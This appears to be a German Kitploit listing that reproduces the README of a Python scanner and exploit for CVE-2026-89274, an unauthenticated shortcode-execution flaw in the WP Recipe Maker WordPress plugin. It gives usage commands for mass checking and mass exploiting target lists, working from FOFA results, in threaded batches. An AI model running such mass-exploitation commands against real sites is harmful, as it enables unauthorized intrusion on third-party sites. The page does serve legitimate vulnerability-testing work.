Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-89274 — Python-PoC-Scanner und Exploit für CVE-2026-89274, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung in WP Recipe Maker <=10.8.1 über Rezeptbewertungskommentare und JSON-LD. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-89274
SchwachstellenscannerSchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-89274

CVE-2026-89274

Python-PoC-Scanner und Exploit für CVE-2026-89274, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung in WP Recipe Maker <=10.8.1 über Rezeptbewertungskommentare und JSON-LD.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-89274 — WP Recipe Maker Beliebige Shortcode-Ausführung

Python 3 PoC-Scanner/Exploit für CVE-2026-89274 in WP Recipe Maker.

Pluginwp-recipe-maker
Betroffen≤ 10.8.1
Behoben in10.8.2+
CVSS9.1 (Kritisch)
AuthNicht authentifiziert (Kommentar-Übermittlung)
CWECWE-94

Zusammenfassung

WPRM_Metadata::sanitize_metadata() führt do_shortcode() auf Metadaten-Feldern aus, bevor strip_shortcodes() aufgerufen wird. Genehmigte Rezeptbewertungs-Kommentare (wprm-comment-rating) befüllen das JSON-LD reviewBody; injizierte Shortcodes werden beim Laden der Rezeptseite ausgeführt und können Ausgaben in strukturierten Daten preisgeben.

Voraussetzung: Der bösartige Kommentar muss genehmigt sein (automatische Genehmigung oder Moderator). Der Exploit-Modus kann --verify verwenden, um zu bestätigen, dass der Marker im JSON-LD reviewBody erscheint.

Anforderungen

  • Python 3.9+
  • pip install -r requirements.txt

Verwendung

root@kitploit:~
pip install -r requirements.txt

# Check plugin version + recipe page with comment rating form
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# Mass exploit from check output (candidates.jsonl)
python poc.py --list candidates.jsonl --mode exploit --threads 20 \
  --shortcode "[caption]PROBE[/caption]" --verify --quiet

# Single-target exploit + JSON-LD verification
python poc.py -u https://target.example --mode exploit \
  --recipe-url /some-post-with-recipe/ \
  --shortcode "[caption]PROBE[/caption]" --verify

# Verify after comment approval (marker from exploit JSON)
python poc.py -u https://target.example --mode verify \
  --recipe-url /some-post-with-recipe/ --marker wprm89274_abc12345

# Batch verify prior submissions (submitted_mass.txt format)
python poc.py --list submitted_mass.txt --mode verify --threads 30 --quiet \
  --output verify_submitted.jsonl --vuln-list verified_leaks.txt

submitted_mass.txt Zeilenformat (Verify-Modus)

root@kitploit:~
https://target.example|https://target.example/recipe-post/|post=123|marker=wprm89274_abc12345

CLI-Optionen

OptionBeschreibung
-u, --urlEinzelne Ziel-Basis-URL
--listURL-Liste, candidates.jsonl oder submitted_mass.txt (Verify)
--modecheck, exploit oder verify
--recipe-urlBeitrags-URL mit eingebettetem WPRM-Rezept + Kommentaren
--post-idWordPress comment_post_ID
--recipe-idWPRM-Rezept-ID (optional --use-api)
--shortcodePayload im Kommentartext (Standard-Probe-Shortcode)
--markerVerify: JSON-LD nach Marker-Teilstring durchsuchen
--verifyExploit: Leak im JSON-LD nach Übermittlung bestätigen
--use-apiZusätzlich Premium-Benutzerbewertungs-REST-Pfad versuchen
--threads, -jMassenparallelität (Standard 20)
--outputJSONL-Ergebnisse (Standard cve_2026_89274_results.jsonl)
--vuln-listTextausgabe für Treffer/Leaks (Standard hits.txt)
--candidates-listCheck-Treffer-Metadaten (Standard candidates.jsonl)
--quietWeniger Fortschrittsausgabe bei Massenläufen

Ausgabe (Massen-Check)

DateiInhalt
cve_2026_89274_results.jsonlJSON pro Ziel
hits.txtKandidaten-Basis-URLs
candidates.jsonlpage_url, post_id, recipe_id, version

Häufige status-Werte (Check)

StatusBedeutung
candidateAnfällige Version + Rezeptseite mit wprm-comment-rating
plugin_no_recipe_commentsPlugin vorhanden, keine geeignete Rezept-/Kommentarseite gefunden
recipe_no_comment_ratingRezeptseite ohne Bewertungskommentar-Formular
patchedVersion ≥ 10.8.2
no_pluginWP Recipe Maker nicht erkannt

Einschränkungen

  • Die Auswirkung des Shortcodes hängt von anderen installierten Plugins/Themes ab; harmlose Probes verwenden (z. B. [caption]).
  • Viele FOFA-/Listen-Ziele sind gepatcht oder verfügen über keine öffentlichen Bewertungsformulare.
  • Archiv-URLs (/blog/, /recipes/) zeigen möglicherweise keine JSON-LD-Leaks; der Exploit bevorzugt einzelne Rezept-Permalinks bei der Seitenerkennung.
  • --verify bestätigt nur die JSON-LD-Reflexion, nicht vollständige RCE.

Repository-Struktur

root@kitploit:~
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Lokale Scan-Listen und Laufzeit-Artefakte (list.txt, *.jsonl, submitted_mass.txt, …) befinden sich in .gitignore und sollten nicht committet werden.

Rechtliches

Nur für autorisiertes Sicherheitstesting. Sie sind für die Einhaltung der geltenden Gesetze und Programmregeln verantwortlich.

Tool herunterladen